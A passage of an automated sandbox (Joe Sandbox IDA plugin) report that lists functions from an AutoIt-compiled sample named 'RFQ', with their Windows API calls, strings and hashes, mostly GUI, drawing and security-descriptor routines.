                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                            • String ID:
                                                                            • API String ID: 4124339563-0
                                                                            • Opcode ID: e1ad8568f0a6185ef91c0213b71194b4f4af27e25bb14a741ae9ca3134addc20
                                                                            • Instruction ID: f88c4bc2f0641854b77842a816a46d231b4a5a172dc08e4f32404fec8b603aca
                                                                            • Opcode Fuzzy Hash: e1ad8568f0a6185ef91c0213b71194b4f4af27e25bb14a741ae9ca3134addc20
                                                                            • Instruction Fuzzy Hash: 10A1B272048305FFD7119FA8DC48A9B7BBAFF88320F208A19F952961E1D738D944DB55
                                                                            Function 0069A2FA Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?), ref: 0069A389
                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 006D7518
                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 006D7551
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 006D7996
                                                                              • Part of subcall function 0069A4D7: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0069A15D,?,00000000,?,?,?,?,0069A12F,00000000,?), ref: 0069A53A
                                                                            • SendMessageW.USER32(?,00001053), ref: 006D79D2
                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 006D79E9
                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 006D79FF
                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 006D7A0A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                            • String ID: 0
                                                                            • API String ID: 2760611726-4108050209
                                                                            • Opcode ID: 683620ba0226d407f634439b7b7ef5950bd81390f262f0d90f7c2eb4662b4380
                                                                            • Instruction ID: 3a24cd50a1d15ab43128f5f40d8ee554faa86dd7d5e2c320cc18afd4ee599baa
                                                                            • Opcode Fuzzy Hash: 683620ba0226d407f634439b7b7ef5950bd81390f262f0d90f7c2eb4662b4380
                                                                            • Instruction Fuzzy Hash: 2E12BB30908251DFCB21CF68C898BE9BBE7BB44301F54846AE495CB761E735ED42CB96
                                                                            Function 00702638 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000), ref: 00702665
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00702791
                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 007027D0
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 007027E0
                                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00702827
                                                                            • GetClientRect.USER32(00000000,?), ref: 00702833
                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 0070287C
                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0070288B
                                                                            • GetStockObject.GDI32(00000011), ref: 0070289B
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0070289F
                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 007028AF
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007028B8
                                                                            • DeleteDC.GDI32(00000000), ref: 007028C1
                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007028ED
                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00702904
                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00702944
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00702958
                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00702969
                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 0070299E
                                                                            • GetStockObject.GDI32(00000011), ref: 007029A9
                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007029B4
                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 007029BE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                            • API String ID: 2910397461-517079104
                                                                            • Opcode ID: d2fd6d3161c9f61b2530586a832a3afd6b1470ce5489190ba03093cf3bcfa93c
                                                                            • Instruction ID: 6985eab585594275a873a573b19db08a86bec49920460ab60a70428713c8fe61
                                                                            • Opcode Fuzzy Hash: d2fd6d3161c9f61b2530586a832a3afd6b1470ce5489190ba03093cf3bcfa93c
                                                                            • Instruction Fuzzy Hash: E3B162B1A40215AFDB14DFA8CC49FAE77B9EB09711F408254FA14E72D1D7B8AD40CB64
                                                                            Function 006F49FD Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 006F4A0B
                                                                            • GetDriveTypeW.KERNEL32(?,0071D034,?,\\.\,0071D0D0), ref: 006F4AE8
                                                                            • SetErrorMode.KERNEL32(00000000,0071D034,?,\\.\,0071D0D0), ref: 006F4C54
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DriveType
                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                            • API String ID: 2907320926-4222207086
                                                                            • Opcode ID: 394d0b5c67992fdfdef1c68d0808f2d8abcee79a8986d1527b38923361af5a12
                                                                            • Instruction ID: 0489d6759a8c6ad8a0a952b90cffa785eb77896300bdf27a9b69a9d912971a08
                                                                            • Opcode Fuzzy Hash: 394d0b5c67992fdfdef1c68d0808f2d8abcee79a8986d1527b38923361af5a12
                                                                            • Instruction Fuzzy Hash: FA61F6B0B4520D9FCB04DF18CA419BB77A3EB45300B206119E606EB796DFB5DD82CB52
                                                                            Function 007172B7 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSysColor.USER32(00000012), ref: 007172F0
                                                                            • SetTextColor.GDI32(?,?), ref: 007172F4
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0071730A
                                                                            • GetSysColor.USER32(0000000F), ref: 00717315
                                                                            • CreateSolidBrush.GDI32(?), ref: 0071731A
                                                                            • GetSysColor.USER32(00000011), ref: 00717332
                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00717340
                                                                            • SelectObject.GDI32(?,00000000), ref: 00717351
                                                                            • SetBkColor.GDI32(?,00000000), ref: 0071735A
                                                                            • SelectObject.GDI32(?,?), ref: 00717367
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00717386
                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0071739D
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 007173AA
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007173F9
                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00717423
                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00717441
                                                                            • DrawFocusRect.USER32(?,?), ref: 0071744C
                                                                            • GetSysColor.USER32(00000011), ref: 0071745D
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00717465
                                                                            • DrawTextW.USER32(?,00716FC4,000000FF,?,00000000), ref: 00717477
                                                                            • SelectObject.GDI32(?,?), ref: 0071748E
                                                                            • DeleteObject.GDI32(?), ref: 00717499
                                                                            • SelectObject.GDI32(?,?), ref: 0071749F
                                                                            • DeleteObject.GDI32(?), ref: 007174A4
                                                                            • SetTextColor.GDI32(?,?), ref: 007174AA
                                                                            • SetBkColor.GDI32(?,?), ref: 007174B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                            • String ID:
                                                                            • API String ID: 1996641542-0
                                                                            • Opcode ID: 8111f0b5a20b5d4576ca8ac24ec33e1411b5d378594d333e9521454ed3c5ca7d
                                                                            • Instruction ID: b6fe0a874d80ae06a53d61afb1ffbcf34cd5aba3701ae70f88d88a712a84477a
                                                                            • Opcode Fuzzy Hash: 8111f0b5a20b5d4576ca8ac24ec33e1411b5d378594d333e9521454ed3c5ca7d
                                                                            • Instruction Fuzzy Hash: 4A616E72940218BFDF159FA8DC49EEE7BB9EB08320F218115F911AB2E1D7789940DB94
                                                                            Function 00710F26 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 0071105B
                                                                            • GetDesktopWindow.USER32 ref: 00711070
                                                                            • GetWindowRect.USER32(00000000), ref: 00711077
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 007110CC
                                                                            • DestroyWindow.USER32(?), ref: 007110EC
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00711120
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0071113E
                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00711150
                                                                            • SendMessageW.USER32(00000000,00000421,?,?), ref: 00711165
                                                                            • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00711178
                                                                            • IsWindowVisible.USER32(00000000), ref: 007111D4
                                                                            • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 007111EF
                                                                            • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00711203
                                                                            • GetWindowRect.USER32(00000000,?), ref: 0071121B
                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00711241
                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 0071125B
                                                                            • CopyRect.USER32(?,?), ref: 00711272
                                                                            • SendMessageW.USER32(00000000,00000412,00000000), ref: 007112DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                            • String ID: ($0$tooltips_class32
                                                                            • API String ID: 698492251-4156429822
                                                                            • Opcode ID: e19c6626769a0e36d6fcd4ba2d69992fceb28d12714236f9bb5bcce0d3770429
                                                                            • Instruction ID: 5396ba52ced4797eeb25173f530a80e77e64aea92dd13b153265e48e25d66d8e
                                                                            • Opcode Fuzzy Hash: e19c6626769a0e36d6fcd4ba2d69992fceb28d12714236f9bb5bcce0d3770429
                                                                            • Instruction Fuzzy Hash: B4B1C071604341AFD710DF68C885BABBBE5FF88710F408A1CF6899B291C775D885CBA6
                                                                            Function 0069E825 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0069E8FC
                                                                            • GetSystemMetrics.USER32(00000007), ref: 0069E904
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0069E92F
                                                                            • GetSystemMetrics.USER32(00000008), ref: 0069E937
                                                                            • GetSystemMetrics.USER32(00000004), ref: 0069E95C
                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0069E979
                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 0069E989
                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0069E9BC
                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0069E9D0
                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 0069E9EE
                                                                            • GetStockObject.GDI32(00000011), ref: 0069EA0A
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0069EA15
                                                                              • Part of subcall function 0069EA9A: GetCursorPos.USER32(?), ref: 0069EAAE
                                                                              • Part of subcall function 0069EA9A: ScreenToClient.USER32(?,?), ref: 0069EACB
                                                                              • Part of subcall function 0069EA9A: GetAsyncKeyState.USER32(00000001), ref: 0069EB02
                                                                              • Part of subcall function 0069EA9A: GetAsyncKeyState.USER32(00000002), ref: 0069EB1C
                                                                            • SetTimer.USER32(00000000,00000000,00000028,0069A671), ref: 0069EA3C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                            • String ID: AutoIt v3 GUI
                                                                            • API String ID: 1458621304-248962490
                                                                            • Opcode ID: 02dc772c6a8b955c53030a990b8f1eb8af8f5f3dd6d9db9735f337354567353f
                                                                            • Instruction ID: 852bbde357012b113f6b46cd8602fc191710598771cea24b80c6eca843061a48
                                                                            • Opcode Fuzzy Hash: 02dc772c6a8b955c53030a990b8f1eb8af8f5f3dd6d9db9735f337354567353f
                                                                            • Instruction Fuzzy Hash: 78B15B71A402099FDF14DFA8CC45BEE7BB6FB48711F10822AFA15AB2D0D779A841CB54
                                                                            Function 006E0CCF Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006E103D: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006E1058
                                                                              • Part of subcall function 006E103D: GetLastError.KERNEL32(?,00000000,00000000,?,?,006E0ADF,?,?,?), ref: 006E1064
                                                                              • Part of subcall function 006E103D: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,006E0ADF,?,?,?), ref: 006E1073
                                                                              • Part of subcall function 006E103D: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,006E0ADF,?,?,?), ref: 006E107A
                                                                              • Part of subcall function 006E103D: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006E1091
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006E0D39
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 006E0D6D
                                                                            • GetLengthSid.ADVAPI32(?), ref: 006E0D84
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 006E0DBE
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006E0DDA
                                                                            • GetLengthSid.ADVAPI32(?), ref: 006E0DF1
                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 006E0DF9
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 006E0E00
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 006E0E21
                                                                            • CopySid.ADVAPI32(00000000), ref: 006E0E28
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 006E0E57
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006E0E79
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 006E0E8B
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006E0EB2
                                                                            • HeapFree.KERNEL32(00000000), ref: 006E0EB9
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006E0EC2
                                                                            • HeapFree.KERNEL32(00000000), ref: 006E0EC9
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006E0ED2
                                                                            • HeapFree.KERNEL32(00000000), ref: 006E0ED9
                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 006E0EE5
                                                                            • HeapFree.KERNEL32(00000000), ref: 006E0EEC
                                                                              • Part of subcall function 006E10D7: GetProcessHeap.KERNEL32(00000008,006E0AF5,?,00000000,?,006E0AF5,?), ref: 006E10E5
                                                                              • Part of subcall function 006E10D7: HeapAlloc.KERNEL32(00000000,?,00000000,?,006E0AF5,?), ref: 006E10EC
                                                                              • Part of subcall function 006E10D7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,006E0AF5,?), ref: 006E10FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                            • String ID:
                                                                            • API String ID: 4175595110-0
                                                                            • Opcode ID: f098058f3a49036c35e8267ad4725c56b19633d7f9b3fac33724f0dba5fb259f
                                                                            • Instruction ID: 6e0972d28b4a9de2cecf3a575e00bd452c0199ab138d3b8b3caed3cf15b4c9d4
                                                                            • Opcode Fuzzy Hash: f098058f3a49036c35e8267ad4725c56b19633d7f9b3fac33724f0dba5fb259f
                                                                            • Instruction Fuzzy Hash: DC71AD71901349AFEF11DFA5DC45FEEBBBABF08300F148565E914E6290D7749A81CB60
                                                                            Function 0071822E Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 196windowlibraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 0071824C
                                                                            • _wcslen.LIBCMT ref: 00718260
                                                                            • _wcslen.LIBCMT ref: 00718283
                                                                            • _wcslen.LIBCMT ref: 007182A6
                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007182E4
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0071354D,?), ref: 00718340
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00718379
                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007183BC
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007183F3
                                                                            • FreeLibrary.KERNEL32(?), ref: 007183FF
                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0071840F
                                                                            • DestroyIcon.USER32(?), ref: 0071841E
                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0071843B
                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00718447
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                            • String ID: .dll$.exe$.icl$M5q
                                                                            • API String ID: 799131459-3388446914
                                                                            • Opcode ID: f3cf95ceb7a33bcd14e4a257a3b9c8481a79dbc4ef047a765cead17d2d681cce
                                                                            • Instruction ID: 00a6b16be16309a4f67a8c2ad2079bafd14d0f723470f3714672318640aba9fc
                                                                            • Opcode Fuzzy Hash: f3cf95ceb7a33bcd14e4a257a3b9c8481a79dbc4ef047a765cead17d2d681cce
                                                                            • Instruction Fuzzy Hash: 2161E0B1540215BEEB55DFA8CC85BFE77A9BF08B10F108209F915D60C1DFB8A990CBA5
                                                                            Function 00710851 Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 007108F9
                                                                            • _wcslen.LIBCMT ref: 00710934
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00710987
                                                                            • _wcslen.LIBCMT ref: 007109BD
                                                                            • _wcslen.LIBCMT ref: 00710A39
                                                                            • _wcslen.LIBCMT ref: 00710AB4
                                                                              • Part of subcall function 00683536: _wcslen.LIBCMT ref: 00683541
                                                                              • Part of subcall function 006E2B2C: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006E2B3E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                            • API String ID: 1103490817-4258414348
                                                                            • Opcode ID: 59ed621ab0a32d7d985d019f6a8c6e2519a645202f96a649d0c90abf91adb44a
                                                                            • Instruction ID: 3d44828d378ed0e1d24759e99fa582f6f7ba8499ab70f58b31b2599570a60a8b
                                                                            • Opcode Fuzzy Hash: 59ed621ab0a32d7d985d019f6a8c6e2519a645202f96a649d0c90abf91adb44a
                                                                            • Instruction Fuzzy Hash: 0FE1B0712083418FC714EF28C4908AAB7E2FF94314B508A5DF8959B3A2DB78ED85CBD5
                                                                            Function 0070C8BF Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
